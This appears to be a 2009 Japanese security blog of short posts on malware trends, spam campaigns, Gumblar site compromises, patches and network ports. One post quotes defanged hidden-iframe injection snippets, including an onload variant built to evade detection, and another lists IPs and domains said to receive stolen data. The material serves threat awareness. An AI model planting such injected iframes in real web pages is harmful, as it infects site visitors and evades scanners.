2009 1H(Q1-Q2) Security Intelligence Report

Microsoftより、2009年上半期のセキュリティ・レポートが公開されました。

マイクロソフト セキュリティ インテリジェンス レポート 第 7 版 (2009 年 1 月 ～ 6 月)

日本語サマリだけでも27ページあります。

Security Intelligence Report v7 is Now Available

セキュリティ インテリジェンス レポート 第7版(2009年上半期)

最後に、日本は、今回感染率が、悪化したものの世界的に感染率の低い国には変わりなく、この低い理由を、IPA様の協力を得てベストプラクティス(最善策)としてまとめています。普段目にすることのない、いろいろな人の活動が少しだけ垣間見えるかもしれません。

※上述、日本語サマリ(Microsoft_Security_Intelligence_Report_volume_7_Key_Findings_Summary_Japanese.pdf)の最終頁参照

流し読みで見てとれるのは・・・・・

Win32/Taterfファミリ（ネットゲームのパスワード窃取トロイ）が相変わらず多いこと。

参考：オンラインゲームのパスワードを狙うウイルスが猛威、目的は「金銭」

Confickerの感染例が一般にはほとんどなく、企業内が多いこと（イントラの内側から侵食されるケースが多い）

XPの感染例が圧倒的に多いこと

CVE-2007-0071 (9.0.115.0 and earlier, and 8.0.39.0 and earlier) なんて代物がまだ影響を及ぼしていること（苦笑）

参考：Flash Playerのセキュリティ脆弱性に対処するためのアップデート公開 -- リリース日：2008年４月８日

ちなみに、この情報は MSRTにより実際に駆除された数のサマリーをベースにしていますので、（正常に稼働している）セキュソフトによって駆逐された数は含まれていません。

逆説的にいえば、ノーガードに近いPCの最後の防壁として MSRTが機能していることを示しています。

----------

Gumblar Magnified

Gumblarは現在機能停止中らしいのですが（自主規制なのか、インジェクショングループの抗争なのかは不明）

Gumblar update

77987271＝1UNITED STATES*

1765499↑7INDIA

1332345↑12ARGENTINA

1244540↑5TURKEY

1094704↓2RUSSIAN FEDERATION

1084510↓6GERMANY

968--↑20+SPAIN

950619↓4ISLAMIC REPUBLIC OF IRAN

881675↓3REPUBLIC OF KOREA

878--↑20+MOROCCO

822--↑20+CANADA

822--↑20+PERU

792487↓8JAPAN

712400↓9THAILAND

689--↑20+AUSTRIA

678163↑17ROMANIA

655382↓10POLAND

654--↑20+ISRAEL

628--↑20+SWEDEN

599173↓16ITALY

Chinaが無いのが何故？とか思うんですが、ウォッチしている中国系のセキュリティレポートにも Gumblar系の話はあまり上がっていません。

あと、VTを使うなら実URLを載せるか、MD5/SHA1を公表するかしてほしいな

そういえば、真っ暗病の回復手段の詳細がITproに記載されていました。

Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？

復旧方法はいいんですが、その後オーナがしなければならない対処を全く記述しないってのもどうなんでしょう？とか思うんですが・・・

----------

Pushdo/Cutwail revived

だれだ、レイズデッドさせたのは？（苦笑）

Malware Conceals Itself as Boss’s Letter

Cutwailスパム継続中 「Hello Darling」

しかし、古典的なスパムですね。やっぱ、スルーしてもいいか、、、

（笑）

年末年始のBotnet-spamの活動時期に差し掛かっていますので、メールサーバのspamフィルタ管理をされている方は注意を怠らないようにしましょう。

----------

National Cyber Security Awareness Month

は終わりました。

SANSの特集へのリンク集

Cyber Security Awareness Month 2009 - Summary and Links

終わりましたが、セキュリティへの取り組みはエンドレスです。

Next steps in cyber security awareness

セキュリティに対する認識やリテラシーを高める為には、日々の研鑚が必要ですが、それはほんの些細なことです。穴に落ちてしまう前に穴の位置を知っておくことが最も重要なことだと考えています。

・パスワードを入力する前に、本当にそれが必要なのかどうか１０秒くらい考えてみる。

・いままで普通に使えていたサービスが突然パスワードを聞いてきたとき、そのサイトが本当に自分のログインしようとしている先なのかチェックしてみる。

・モバイル通信を行う際に、WiFiやFONでパスワード送信しても大丈夫かどうか考えてみる。

・emailでソフトウェアアップデートの御案内が来たとき、その送信元が本当に正しいものなのか確認してみる。

・emailに記載されたURLをクリックした後、URLが見知らぬところにリダイレクトされていないかどうかチェックしてみる。

　※クリックしてる時点でアウトって説もありますが・・・

こいうったことは、習慣化することが必要なのでしょう。

※パスワード強度の話は、また別ですかね？

----------

Passwordの寿命

Password rules: Change them every 25 years

一般的に言われているパスワードの寿命は 90日です。

これは、謂わば呪文のように何度も聞かされ耳にタコが出来ている方もいらっしゃるかもしれません。

そうした、「パスワードを９０日ごとに変更しなさい」というルールは、この四半世紀変わっておらず、パスワードの寿命に関するルール定義そのものを２５年たった今、見直す必要があるのではないか？というオハナシです。

あなたは９０日御気にパスワードを変更していますか？

システムが強制的にパスワードを変更させる場合でも、一度違うパスワードを入力後、即元のパスワードに戻したりしていませんか？（苦笑）

----------

Joomla Jumi Components

CMS Joomla! の プラグイン、Jumiに深刻な脆弱性があり、任意PHPコードをサーバ内で動作させられてしまうとのことです

Issue 45: BACKDOOR in JUMI 2.0.5

Please remove JUMI2.0.5 from the download page immediately to stop people falling victim to this.

It will be simple enough to remove the compromised code from this download, but you need to do

a full security audit on your site as well as you have been compromised.

当該プラグインを使用中の方は急いで対処しましょう。

----------

ナイジェリア詐欺：イラク版

WTF is britisharmy.co.uk?

Lt.Col James Dox of the 1st Battalion 63rd Armor Regiment recently contacted me.

やけにまた具体的な部隊名ですこと・・

----------

ny!

NTTコミュニケーションズ、Winnyのウイルス感染で顧客情報流出

同社は再発防止に向けて、全社員および委託先に対し情報管理のさらなる徹底・強化を図るとしている。

自社でP2P域帯規制しておいて身内が使ってるんじゃ、根拠薄弱って言われそうですが・・

----------

クリーンインストール

Windows 7 upgrade version: The dos and don'ts

『Windows 7』アップグレード版のクリーン インストールに MS が警告

さて・・そろそろ Win7を入れないといけないんですが、なにも予備知識がない（笑）

というか Vistaから上げる必要も本当は無いんですが、テスト環境で１台は必要なので・・

勉強しておきますかネ・・

Windows 7、実はややこしいアップグレードの条件

Windows 7 のアップグレード版とアップグレードインストール -- 世の中は不思議なことだらけ

----------

gaming-scam

詐欺まがいが蔓延―ソーシャル・ゲームの邪悪のエコシステムは放っておけない

私がなぜこれを「エコシステム」と呼ぶかといえば、放置しておけばそれ自身でどんどん悪質化するサイクルが生じているからだ。ユーザーは紹介料目当てのインチキに誘い込まれる。ゲーム・サイトは金を儲ける。儲けた金はFacebookとMySpaceでのゲームの広告に使われ、ますます多くのユーザーを集める。

日本でも、ゲーム内アバターにひどい値段をつけて、「無料」「無料」と連呼しているトコは未だに健在なんですけどね～

----------

今朝は寒かったですね・・

EoF ... See all content Hide content

Reply

gnome 3 months, 2 weeks ago on Wordpress

----------

お知らせ

11月になりました。BGM:November Rain

今週は事務所の引越などがあり、遅延が予定されています。

今後どうなるかわかりませんが、出来る限り続けていきますのでお願いします。

----------

だいたい、月の初めの日はいろいろ記念日が多い・・

紅茶の日

灯台記念日

点字記念日

諸聖人の日（万聖節）

自衛隊記念日

寿司の日

犬の日

本格焼酎の日

泡盛の日

計量記念日計量法

友の日(ハローキティの誕生日)

古典の日

----------

最終日

Cyber Security Awareness Month - Day 31, ident

Welcome to day 31 of Cybersecurity Awareness Month!. I hope that you have enjoyed reading and responding to it as much as we have enjoyed writing it!

ちょっと分からないサービスやポートがあったりして調べ物をしたり、ごまかしたりしましたが、楽しかったですよ（笑）

最後は Ident(Identification Protocol)

TCP/113 Identについては以下が詳細に解説されています。

TCP/113 AUTH/IDENT に関して

このとき、Identプロトコルによって付与される所有者情報に何が記載されているのか、あるいは偽装されていないか？といった懸念を払拭するためにはどうしたらいいのか？

最大の防御は何も記述しないことになってしまうのではないでしょうか？（苦笑）

Ident について -- 1999.01

----------

Chat-in-the-Middle攻撃

銀行員を装いチャットで接近、ますます巧妙化するオンライン詐欺

一般的なフィッシング詐欺では、正規サイトに似せたサイト上でユーザーにIDやパスワードを入力させて情報を盗み出す。これに加えて、Chat-in- the-Middle攻撃ではライブチャットが始まると、ソーシャルエンジニアリングの手法を用いてユーザーに攻撃者を銀行担当者と信じさせる。会話を通じてユーザーの氏名や住所、メールアドレス、電話番号などのほか、ユーザー認証の際に使われる「秘密の質問」とその回答などの情報を聞き出そうとする。

ああ・・XMPPの評判がこんなとこで下がってしまう（笑）

----------

言霊って信じますか？

先日、Donbotのことを書いたときに Pushdo/Cutwail の勢力が低下とか書いちゃったわけですが・・

Cutwailを添付したスパム

えっと、まさかのCutwailスパムの大量受信です。。。

フラグを建ててはいけないという神（紙）のお告げなんでしょうか・・

From : boss@xxxx.yy.zz

Please read the attached letter and get back to my office for more details to proceed further.

Thanks and have a very nice day.

「ボスより。添付した文書を読んでから私のオフィスに来て詳しく説明してくれ。じゃ。」

こんなメールに引っかかる人はインターネット（笑）適性検査を受けた方がいいかもしれない・・・

----------

Conficker

もうすっかり存在を忘れてますが、結構勢力をキープしているようで・・？

After one year, Conficker infects 7 million computers

The Conficker worm has passed a dubious milestone. It has now infected more than 7 million [m] computers, security experts estimate.

7百万ユニークIPの感染BOTですか・・

Despite its size, Conficker has rarely been used by the criminals who control it. Why it hasn't been used more is a bit of a mystery.

spamの発信に使われるでもなし、DDoS攻撃に使われるでもなし・・なんか「ただ感染し、拡大を続けている」オートマトンのような存在になっています。

Infection Tracking

そういえば、Microsoftが出した25万ドルの懸賞金はどうなったのでしょう・・？（笑）

----------

人それぞれ

青色LEDが氾濫中、「目障り」？

青色LEDは輝度が高く目立ちやすいほか、また人間に不快・不安を感じさせたり、睡眠パターンの乱れや免疫システムに影響を与えるという研究もあるそうだが

JR東日本が、自殺防止目的で山手線全駅に青色LED照明を導入

ＪＲ東日本東京支社は１５日、山手線全２９駅のホームに青色ＬＥＤ（発光ダイオード）照明を導入すると発表した。青色は人の心を落ち着かせるとされ、増える飛び込み自殺を防ぐ狙いだ。全線での導入は全国的にも珍しい。

----------

もうそんな時期が・・

年賀状のフォントとハードリンク

もう年賀状の時期なのかぁ・・・

emailで済ませちゃだめですか？（笑）

----------

GSB中継サーバを落としてしまったので今日・明日はありません。

EoF ... See all content Hide content

Reply

gnome 3 months, 2 weeks ago on Wordpress

日本茶の日

ガス記念日

世界勤倹デー (倹約しましょう)

宗教改革記念日 (マルティン・ルターが、「95ヶ条の論題」を教会の扉に提示した)

天長節祝日 (大正天皇の誕生日は8月31日であるが盛夏では式典の執行に不都合があるため)

----------

You may happy Halloween?

だいたい、日本には万聖節なんか関係ないし、製菓メーカーのイベントと化してる気はしますが・・楽しめればいいか（笑）

もちろん楽しめない側面もあるわけでして・・

Poisoned candy scare（訪問してきた子供たちに毒入りキャンディを配った事件）

やら、

今夜、山手線を厳重警戒せよ！　ハロウィーンでＪＲ - 2008.10.31

いっぽう Google キーワードがハロウィン関連で急上昇するのも当然のこと

A ghooooulish Googleween

日本では仮装行列はあんまり流行してないようですが、今後は縫製メーカあたりも力を入れてくるんでしょう・・・

で・・セキュリティ的には

BlackHat SEO(SEO Poisoning)やら spam やら Phishingやらもありまして、特に海外発のイベント（？）ということもあり英語サイトや英文メールにもついついクリックしてしまう人が居るようですので注意しましょうネ。

Trick or Treat With Spam and Malicious Screensavers

Just think of it: Would you like some candy or Viagra for Halloween?

イラネーヨ（笑）

This Halloween, Enjoy the Treats but Be Wary of Online Tricks

Trick or Threat?

Koobface, ZeuS and Ilomo(Clampi) botnets

FakeAV

and BlackHat SEO

キーワード的には合ってるけど、GumblarとBredolabも忘れないであげてください・・・

Trick or treat?

use this discount code: HALL-6666（笑）

最近は、悪質サイトなのか正規サイトなのか見分ける術が無くなりつつありますので、自己防衛が必須ですね。

----------

Tales of Gumblar

現在は一時的に身を引いた Gumblar.Xですが、今後どうなるかは（作成者以外）誰にもわかりません。

The new gumblar

感染（陥落）サイト国別リスト ワースト20

7271UNITED STATES*

704RUSSIAN FEDERATION

675REPUBLIC OF KOREA

619ISLAMIC REPUBLIC OF IRAN

540TURKEY

510GERMANY

499INDIA

487JAPAN

400THAILAND

382POLAND

379BRAZIL

345ARGENTINA

298CZECH REPUBLIC

187HUNGARY

182BELGIUM

173ITALY

163ROMANIA

159UKRAINE

157FRANCE

117VIET NAM

A deeper analysis of counts in Japan revealed at least 487 compromised sites, of which 357 are still injected with malicious URLs at the time of writing.

日本は堂々の８位入賞・・・

Of course, the numbers above aren't final and are rising every day.

そう、まだ終わってないのです。

報道等をみていると、「XPで起動しなくなったウィルス騒ぎ」とか的外れなことを言っているところが多いですが、ウィルスでPCが起動しなくなったことが問題なのではなく、既にバックドアによってIDやらPasswordやらが抜かれている可能性がある点が問題なのです。

といっても前回のGumblar(Martuz)終息後に、各メディアであれだけ注意喚起されたにもかかわらずこの有様ですから、根本的な解決は難しそうです。

----------

Repeat after me "Did you apply test and test?"

MS09-043: Microsoft Office Web コンポーネントの脆弱性により、リモートでコードが実行される (957638)

公開日: 2009年8月12日 | 最終更新日: 2009年10月28日

なぜこのセキュリティ情報は 2009 年 10 月 27 日に更新されたのですか?

マイクロソフトは Microsoft Office Access Runtime 2003 がインストールされている環境での検出の問題を解決する Microsoft Office 2003 Service Pack 3 および Microsoft Office 2003 Web Components Service Pack 3 用の更新プログラムを再度提供するために、このセキュリティ情報を再リリースしました。これは検出の変更のみで、バイナリへの変更はありません。更新プログラムがシステムに正しくインストールされたお客様は、この更新プログラムを再インストールする必要はありません。

MS09-062: GDI+ の脆弱性により、リモートでコードが実行される (957488)

公開日: 2009年10月14日 | 最終更新日: 2009年10月29日

2009/10/29:

このセキュリティ情報ページを更新し、Microsoft Office Visio Viewer 2007、Microsoft Office Visio Viewer 2007 Service Pack 1 および Microsoft Office Visio Viewer 2007 Service Pack 2 を影響を受けるソフトウェアに追加し、SQL Server 2008 および SQL Server 2008 Service Pack 1 を影響を受けないソフトウェアに追加しました。

あいかわらず、理解不能な日本語デス

マイクロソフト、10月度パッチの不具合に対処

米国Microsoftが2週間前にリリースした10月度の月例セキュリティ・パッチの一部で不具合が生じており、同社は対応に乗り出した。

同社はここ数日の間に、2件のセキュリティ・アップデートを再リリースしたほか、1件の問題に関する解決方法を公表した。この問題とは、Windows CryptoAPIのパッチにより、Office Communications Serverのサービスが動かなくなるというものだ。

これだけ脆弱性が多いと見落としもあるのは、ある意味ショウガナイのでしょうね。

----------

ノミ行為は法律違反です

どのBotnetが、どんな手段で、どのサービスを狙ってくるのか、BOOKIEあたりが始めそうな勢いですが（苦笑）

Myspaceのパスワード初期化を騙るスパム

今回は ZeuSで、eMail(spam)を使い、パスワード初期化の案内から 添付ファイルで感染誘導しています。

次は・・・？

----------

Donbot

米Pricewert(3FNの運営元）の停止後、Pushdo/Cutwailによるspamが少しだけ減りましたが、すぐに元の水準に戻ってしまい、「いつものいたちごっこ」が続いています。

そんな中、黙々と活動を続けるBotnet Donbotの存在を FireEyeが解析、レポートしています。

A little more on Donbot...

元は、McColo を拠点としていた単純な spam-bot だったようですが、spam送受信コマンドの手口や隠蔽化（潜伏）の手口が巧妙化していることが判ります。

とりわけ興味深いのは、感染者（bot)がブラックリストに載ってしまった場合、ブラックリストから解除されるまで「bot活動を停止する」ためのコマンドが存在している点です。

現在の C&C 存在先・・・KRYPT TECHNOLOGIES

どっかで見たような・・？

----------

Day -29- DNS port 53

Cyber Security Awareness Month - Day 29 - dns port 53

----------

Day -30- VPN port (valious)

Cyber Security Awareness Month - Day 30 - The "Common" IPSEC VPN Protocols - IKE / ISAKMP (500/udp), ESP (IP Protocol 50), NAT-T-IKE (500/udp, 4500/udp), PPTP (tcp/1723), GRE (IP Protocol 47)

IKE (Internet Key Exchange) : 500 UDP

ESP (Encapsulating Security Payload) : IP Protocol 50

NAT-T (NAT Traversal in the IKE) : 4500 UDP

PPTP (Point to Point Tunneling Protocol) : 1723 TCP

(*)PPTP を理解する

(*)PPTPによるVPNの構築

PPTP (Point to Point Tunneling Protocol) : 1723 TCP

AH (Authentication Header) : IP Protocol 51

GRE (Generic Routing Encapsulation) : IP Protocol 47

勉強してもしても追いつかない VPN 関連（苦笑）

概要の入門はこのへんでしょうか？

第2回　インターネットVPNの基礎知識

----------

ジャストキーエンス

ジャストシステム創業者の浮川夫妻、取締役会長/副会長を辞任

残念です・・

----------

Google Safe Browsing STATUS:

| 1256950805 | B | [goog-black-hash 1.43366 update]

| 1256950802 | M | [goog-malware-hash 1.16835 update]

| 324983 | current blocked

| 879127 | total logged

EoF ... See all content Hide content

Reply

gnome 3 months, 3 weeks ago on Wordpress

ホームビデオ記念日(ビデオ戦争)

おしぼりの日 (全国おしぼり協同組合連合会)

とらふぐの日

----------

don't update firefox (with Norton)

またやらかしてくれたようで・・

NIS2010のアップデートでアドオンが使用できなくなる問題が発生 -- Mozilla Flux

アドオンマネージャから個別のアドオンの設定画面を呼び出そうとすると処理が停止してしまうほか、アドオンを更新しても、再起動を促すメッセージは表示されるものの、通知バーが出ないのが特徴だ。とくに前者は、Firefox本体を終了してもウィンドウが残ってしまい、タスクマネージャでプロセスを消すことを余儀なくされる。不便なことおびただしい。

会社のPCに入れる前に気がついてよかった・・・

かといって脆弱性の残っていることが判っているバージョンを使い続けるわけにもいかず・・・セキュソフトの都合で脆弱性バージョンを使うってセキュソフトの存在意義が問われそうですね（苦笑）

Re: Norton Toolbar disappears after applying 17.1.0.14 patch

We don't have a firm ETA on the fix right now.

NO ETA™

あと、こんなのも起きてる様子・・・

Unable to launch Microsoft Outlook after applying 17.1.0.14 patch

but I cannot get Outlook to open at all. I get a message "Cannot start Microsoft Outlook. Cannot open the Outlook window." I do a lot of my small business work by e-mail, so this is fairly serious.

会社のNorton信奉もそろそろ何とかしたい・・・

----------

BlackBerryからの会話はすべて聞かせてもらった！

ガラッ！って効果音が必要だったかな？

BlackBerry PhoneSnoop Application Used to Spy on Users

US-CERT is aware of public reports of a new software application called PhoneSnoop. This software allows an attacker to call a user's BlackBerry and listen to personal conversations. In order to install and setup the PhoneSnoop application, attackers must have physical access to the user's device or convince a user to install PhoneSnoop.

US-CERT warns about BlackBerry spyware app

PhoneSnoop – Turn a BlackBerry into a portable bug

BlackBerryの盗聴アプリ「PhoneSnoop」に要注意

RIM、BlackBerryの盗聴アプリに見解

RIMが調査したところ、PhoneSnoopは特定の電話番号からの着信で起動し、端末を盗聴デバイスに変えてしまうことが分かった。盗聴できるのは端末での通話内容ではなく、端末の周囲の音声であるといい、端末にセキュリティホールが存在するわけではないと説明している。

実際に盗聴するには、US-CERTが解説しているように標的となるユーザーの端末へPhoneSnoopを直接インストールする必要があり、攻撃手法の難易度は極めて高いという。

とりあえずは、端末の物理的操作が必要なようですが、BlackBerryユーザは自分の端末（あるいは会社の支給品）にどんなアプリがインストールされているか把握する必要があるということでしょう。

※上司が盗聴してるかも？とか考えるとちょっと怖い・笑

----------

Cisco to Acquire ScanSafe

Cisco Announces Intent to Acquire ScanSafe

SAN JOSE, Calif. – Oct. 27, 2009 – Cisco today announced its intent to acquire privately held ScanSafe, Inc.

お～

これは予想していなかった買収です。

Gumblarなどの解析結果は今後はCiscoから出されるのかな？（笑）

ともあれ、「おめでとうございます」。ということにしておきましょう。

Cisco、Webセキュリティ企業のScanSafeを1億8300万ドルで買収

----------

Gumblar calm down

Adobe Reader / Acrobatを狙う攻撃が減少【Tokyo SOC Report】

現在のところ鎮静化傾向にありますが、改ざんされたままのWebサイトもあるので、依然として注意が必要です。クライアントPCでご利用のアプリケーションを最新のバージョンへアップデートすることをご検討ください。

穿った見方をすれば、「目的は達したので戦略的撤退」を果たしただけかもしれません。何しろ５月末から今までずっと潜伏し、網を張っていた組織ですので・・・

この手の犯罪に憶測は禁物ですが。

被害とその実態および回復

新種の「Gumblar」PHPウイルスがはやっています

【警告】新種の「Gumblar」PHPウイルスの猛威　そのメカニズム

「やられ群」１・２・３の組み合わせがねずみ講を連想してしまうのは私だけ？（笑）

想像ですが、やられ群１と２に関しては、旧Gumblarによって盗まれたFTP Credential(s)の中から無作為に抽出したものではないか？と考えています。特に１群にはバーチャルホストに収容されているレンタルサーバを狙っている節があり、対策が難しい点を悪用しているような気がします。（ISPが実稼動機を停止できないため、ISPが各個にユーザへの感染確認などを行うハメになってしまい、結果的に時間稼ぎをされてしまう）

----------

iFrameインジェクションの進化

Evolution of Hidden Iframes

iframeを隠す手段としてよく使われているのが

＜iframe src="hxxp://gumblar .cn/ count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no＞＜/iframe＞

のように visible 属性を none にしたり、 style属性を hidden にしたりする手法です。あるいは、＜div style="display:none"＞のように、直前のdivブロックを非表示にすることもよく目にします。

今回新しく発見された手法は

＜iframe frameborder="0" onload="if (!this.src){ this.src='hxxp://gumblar .cn/ index.php'; this.height='0'; this.width='0';}" ＞dvexgqoexlsvajdiodgqvxswnifzmxo＜/iframe＞

onloadを使って、検出パターンから逃れようとしています。

インジェクション onload属性の利用

----------

DAY -27- Active Directory Ports

137 138 139 および 445 を外部に出し・外部から応答にしている方はさすがに減ったのではないか？とは思っていますが・・・・

Cyber Security Awareness Month - Day 27 - Active Directory Ports

他にも沢山使っています。

こうした Windowsサービスで使用されているポートのトラフィックは VPNを使っているのであればそのトンネルのみを許可、それ以外であれば基本的にはルータ・ファイアウォールでブロックしておいたほうが無難でしょう。

第4回　ネットワーク・セキュリティを実現する「Windowsファイアウォール」 -- 2005.06

もっとも、VPNを経由したADは、細切れになったファイルの転送が激しく遅いという NetBIOSの特徴で、使い物にならないほど速度が低下することがありますが・・・

----------

DAY -28- NTP 123UDP

Cyber Security Awareness Month - Day 28 - ntp (123/udp)

ケルベロス認証は使ってませんが、同期がときどき日単位で狂うことはありますね（苦笑）たぶん、何かの設定がおかしいのでしょうけど、放置していたら怒られそうなので同期頻度を上げたことはあります。

あと time_t()の2036/2038年問題なんかもあったような・・

----------

時間切れ

Google Safe Browsing STATUS:

サーバ堕ちてる（泣）

本日帰社予定～

EoF ... See all content Hide content

Reply

gnome 3 months, 3 weeks ago on Wordpress

速記記念日 (日本速記協会)

ABCの日 (社団法人 日本ABC協会)

群馬県民の日

----------

Gumblar vs 8080 ?

昨日、Sophosの iframes are EVIL! Hate Zeus! を取り上げましたが、Zeus、8080、そしてGumblar.x とが入り乱れてインジェクションコードがおかしくなっているようですね

gumblar自己中心派

とりあえず無害ですが…。

何かほんとに内部抗争でもやってるのかな・・・？

ともあれ、インジェクションコードがコロコロ変わっているということは、攻撃続行中であることだけは事実です

Web サイト経由でのマルウエア感染拡大に関する注意喚起 -- JPCERT/CC

----------

自分の伯母さんにセキュリティアップデートをさせてみた

わかりますか？ この言葉～「プラグインの更新なんて無理！」という方に

実にいいコラムです。皆さんにも見てもらいたいです。

so-netがセキュ企業をどっか買い取って、サポート始めると面白そうなんですケドネ

----------

脆弱性情報 by HITACHI -- 2009.10.27

BGM:

今回は非常に重要かつ判りやすい解説がありますので、必見です。

チェックしておきたいぜい弱性情報＜2009.10.27＞

Adobe Reader，Acrobatのセキュリティ・アップデート（2009/10/13）

マイクロソフト2009年10月の月例セキュリティ・アップデート（2009/10/14）

VMware ESXに複数のぜい弱性（2009/10/16）

Cyber Security Bulletin SB09-285（2009/10/12）(Ooo)

----------

facebook spam

で、まずはBredolab

Malicious Facebook Password Spam

Hey xxxxxxx

Heyかよ！

添付ファイル:

Facebook_Password_c92dd.exe -- 2009.10.26 21/41 (29.27%)

Trojan.Bredolab is Making Yet Another Comeback.

Facebook password-reset spam is Bredolab botnet attack

ということで、妙なspamには気をつけましょう。

※そもそも添付ファイルがついている時点でアウトですけどね・・・

----------

spam disguised FDIC

さらに ZeuS(Zbot)ですが、新たな攻撃方法を・・・

連邦預金保険公社(Federal Deposit Insurance Corporation)のspamから偽装サイトへの誘導を行う・・

Malicious Attacks on Depositors Via Phony FDIC Warnings

中身：Infostealer.Banker.C

Fake FDIC spam campaign spreads Zeus malware -- Gary Warner

pdf.exe -- 2009.10.27 9/41 (21.95%)

fdic.govの偽サイト -- October 27, 2009

あ～ほんとにZeuSはしつこい（苦笑）

----------

Malvertising

ついこないだ、GoogleがMal-Advertisingの話をしたばかりですが

Gizmodo hit by malware adverts

Apologies: We Had Malware Running as Ads On Gizmodo

GIZMODEの広告に、偽アンチウィルスソフトへの誘導広告が載せられ、被害者が出ている模様です。

Gawker Media tricked into featuring malicious Suzuki ads

Gawker MediaはGIZMODEの運営者です。

Gawker Scammed By Malware Crew Pretending To Be Suzuki

この前の NewYorkTimesの一件と同じですね

New York Timesがまさかのマルウェア広告、いったい何が起きたのか?

New York Timesをだまして広告契約、マルウェア配信に利用

----------

VMware New Release

セキュパッチが多すぎて対応に苦慮している方も多いかとは思いますが、VMwareの各種クライアントモデルがバージョンアップしました。

VMware Fusion 3.0

Workstation 7 Release Candidate Available!

VMware ACE 2.6

New VMware Desktop Products Released (Workstation, Fusion, ACE)

VMware Fusion 3.0 went from Release Candidate to General Availability last night, as did VMware Workstation 7.0 and VMware ACE 2.6

Lots of new stuff - the feature I welcome the most is nested VMs. This allows you to run ESX with guests inside of workstation (if you have enough memory that is). This is a great feature if you are doing ESX work on your laptop. This is common in both lab and testing, but we also use this a lot in training. This feature has been in the workstation and fusion products (unsupported) for quite some time, but VMware is finally rolling it into the fold of supported features.

VMwareのようなプロダクツの場合、新機能になったからといって簡単にバージョンアップするわけにもいかず、旧来のバージョンを使い続けてセキュパッチが疎かになるのも困るという二律背反な事象を抱え込んでしまうことが多々あります。

また ESXのほうにセキュリティパッチが出ています。

[Security-announce] VMSA-2009-0015 VMware hosted products and ESX patches resolve two security issues

----------

EMET

Announcing the release of the Enhanced Mitigation Evaluation Toolkit

To help on this front, we are announcing the initial release of a new utility called the Enhanced Mitigation Evaluation Toolkit (EMET). Version 1.0.2 is now available, free of charge at the Microsoft Download Center (Enhanced Mitigation Evaluation Toolkit).

脆弱性が発覚した際に、そのパッチを充てる期間(IN ZERO DAY)、何らかの軽減策を考慮せねばならないことがあるかもしれません（特にエンタープライズ業務の場合）。そうした、セキュリティ的な緩和策を導き出すための手助けとなるツールが MS から出されました。

まだ試してませんが、感想とか聞きたいですね～

----------

Impact of Black Tuesday, Oct2009

先日の１０月パッチにおいて、MSRT(Malicious Software Removal Tool)によって駆除された数のリストが公開されました。

MSRT October Release – Case Study

斜体が FakeAVで、太字がパスワードスティーラですが、ChinaとBrazilは、盗まれてばっかりなんですかね？（苦笑）

日本のリストも出してほしい

----------

西さんが吼える

西和彦曰く「Wikipedia はネットの肥溜」

Wikipediaはネットの肥溜 - 西和彦

そして[要出展]タグを貼られまくるっと・・・

----------

Google Safe Browsing STATUS:

| 1256691605 | B | [goog-black-hash 1.43150 update]

| 1256691602 | M | [goog-malware-hash 1.16763 update]

| 322209 |current blocked

| 860541 |total logged

明後日、通常体制に戻る予定です。　長かった・・・・

EoF ... See all content Hide content

Reply

gnome 3 months, 3 weeks ago on Wordpress

原子力の日 as (第16回原子力ポスターコンクール）

反原子力デー(at 上関原子力発電所)

サーカスの日

柿の日

きしめんの日

建国記念日 オーストリア

----------

いろんな方から、復帰おめでとうと言われて恐縮しております。

こんなサイトですがまだまだ続きそうですので、皆様よろしくお願い致します。

本当は移転する気満々だったのですが、速度がかなり改善されたことと、XMLのエクスポートができないのでもう少しここで居座ります・笑

----------

セキュソフト（？）のセールスマン

「アフィリエイトで配布、月に3000万円稼ぐ会員も」――偽ソフトの実体

偽ソフトの配布方法としては、「作者自身が配布することもあるが、アフィリエイトを使うケースも多い」（シマンテック セキュリティレスポンスシニアマネージャーの浜田譲治氏）。偽ソフトの作者（あるいは作者グループ）は、一般ユーザーを偽ソフト配布サイトへ誘導するためのアフィリエイトを立ち上げ、会員を募集。その会員に配布サイトを宣伝してもらう

こういうのって、ウィルス散布の片棒を担いだら訴追されないんでしょうか？

“業績トップ”のアフィリエイト会員は、月に33万2000ドル（1ドル＝90円で計算すると2988万円）を稼ぐことなどを解説した。

ほんとに払われてるんでしょうかネ？（苦笑）

ちなみに、昨今の「偽セキュリティソフト(FakeAV)」は、「たいして機能をもたない」どころではなく、立派なバックドアとして稼動するものが多く、下手なウィルスよりも性質が悪いです。

----------

Gumblarの情報送信先？

先日ちょっとだけリンクを張っておきましたが、この手の解析に詳しい Fireeye のレポートに、情報送信先の IP が載っています。

Gumblar... Not Gumby!

67.215.246.34 Secured Private Network AS22298

hosted.by.pacificrack.com　という捨てメッセージ有り

収容ドメイン無し

67.212.81.67 Netelligent Hosting Services Inc. AS10929

最近良く目にする防弾ホスト

extrasearch.org THROUGH

aboutsearch.org THROUGH

ebidzilla.com THROUGH

Googleセンセは全スルー

67.212.81.67 ROOT-AS root eSolutionssearch AS44042

おなじみのルクセンブルグの ROOT-ASです

3webinfo.com THROUGH

4searchtips.org THROUGH

accadglobal.com THROUGH

adplaners.com THROUGH

adplanet.org THROUGH

askmeguide.com THROUGH

imutu.com THROUGH

www.perfectdir.org THROUGH

searchpoint3.com THROUGH

thequalityway.net THROUGH

b079.com THROUGH

Googleセンセは全スルー

ま～、情報送信先なので、スルーはショウガナイのかも

企業のFirewallでは、このへんはもう I/O 共にブロックしておいて良いかと思います。

----------

岬ちゃん Failed

横→

にリンク張っている Microsoft謹製無料セキュリティーソフト MSE (aka Morro) ですが、ここ１０日ほどデータ更新されていないと問題になっているようです。

Microsoft anti-virus software dawdles over updates

最大で１０日間ほど「古いままの定義ファイル」を最新のものとして表示していたようです。

たまには手動更新しないとダメなのかな？

----------

Van Morrison

ヴァン・モリソン

VAN MORRISON - Have I Told You Lately? - Live In London

VAN MORRISON - Brown Eyed Girl

のオフィシャルサイトがクラックダウン

How long has this been going on? Star’s site infected -- 22nd.Oct

テイクダウン後も再インジェクション

Mal/Iframe-N: The next big threat?

ファンの方は気をつけましょう。

（旧態なインジェクションなので罠を踏みつけて平気なヒトもいますが・・）

----------

ホスティング at オランダ

防弾ホストの所在国といえば、以前はアメリカからロシア・ウクライナあたりに移転して話題になりましたが、昔からシブトク防弾ホストを運営している国がありますね

NL. Netherlands

そう、LEASEWEB でおなじみのトコです。

Interesting attacks from .NL addresses -- 16th Oct

